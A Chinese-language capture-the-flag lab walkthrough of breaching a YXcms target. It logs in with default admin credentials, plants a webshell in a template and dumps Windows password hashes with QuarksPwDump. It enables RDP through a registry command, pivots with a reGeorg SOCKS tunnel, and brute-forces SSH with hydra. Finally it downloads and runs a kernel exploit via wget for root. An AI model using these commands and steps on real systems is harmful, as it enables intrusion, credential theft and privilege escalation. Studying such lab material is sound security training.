靶场笔记-----YXcms靶场

靶场环境:
前言:YXcms是一款基于PHP+MYSQL构建的高效网站管理系统。 后台地址请在网址后面加上/index.php?r=admin进入。 后台的用户名:admin;密码:123456,请进入后修改默认密码。
1.如果看到是cms,先去搜集信息,百度一下该cms已出现的漏洞。我是根据这个网址发现的漏洞https://zhuanlan.zhihu.com/p/52099335
2.根据前言,在网址后面加上/index.php?r=admin
用户名:admin;密码:123456;
靶场笔记-----YXcms靶场
3.进入后台getshell
在管理首页----前台模板----最新默认模板2013-2-1----管理模板文件----index_index.php
编辑上传一句话木马
靶场笔记-----YXcms靶场靶场笔记-----YXcms靶场

保存退出!
4.测试,发现一句话木马上传成功。
靶场笔记-----YXcms靶场
5.上菜刀,获取更多权限
靶场笔记-----YXcms靶场
6.右键----虚拟终端----whoami,发现是system用户,不用提权。
靶场笔记-----YXcms靶场
7.上传QuarksPwDump.exe,
在终端输入C:\phpStudy2013\WWW\QuarksPwDump.exe --dump-hash-local获取密码
靶场笔记-----YXcms靶场靶场笔记-----YXcms靶场

通过cmd5解码,账户名:Administrator 密码:Hallo(记住,下面会用到)
接下来尝试远程登录。
首先在终端输入netstat -ano,发现3389端口未开启。
开启3386端口命令
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
靶场笔记-----YXcms靶场

尝试远程登录。
靶场笔记-----YXcms靶场

通过上面**的账号密码,远程登录
靶场笔记-----YXcms靶场

拿到flag1
靶场笔记-----YXcms靶场

收集有用信息。
结果发现xshell4新建会话有IP 和用户名

尝试ping一下这个ip,可以ping通。
接下来尝试**密码
通过菜刀往win2003上传reGeorg-master/tunnel.nosocker.php
物理机访问 http://192.168.100.130/tunnel.nosocher.php
靶场笔记-----YXcms靶场
接下来打开kali,运行reGeorg-master
靶场笔记-----YXcms靶场

编辑 /etc/proxychains.conf
socks5 127.0.0.1 8888
靶场笔记-----YXcms靶场靶场笔记-----YXcms靶场

python reGeorgSocksProxy.py -u http://192.168.100.130/tunnel.nosocher.php
靶场笔记-----YXcms靶场

proxychains ssh 172.16.1.1(成功)
靶场笔记-----YXcms靶场
设置字典
靶场笔记-----YXcms靶场

用hydra**密码
账号:admin
密码:123456
靶场笔记-----YXcms靶场
用xshell4连接172.16.1.1
靶场笔记-----YXcms靶场

History收集近期使用的命令,拿到flag2
靶场笔记-----YXcms靶场
Uname -a 查看系统版本
靶场笔记-----YXcms靶场
查看id,用户为admin
靶场笔记-----YXcms靶场
利用内核版本,上传exp提权
靶场笔记-----YXcms靶场
输入命令:
wget 172.16.1.2/exp1 - O exp1
ls -l
chmod 777 exp1
./exp1
cd /root/
拿到flag3
靶场笔记-----YXcms靶场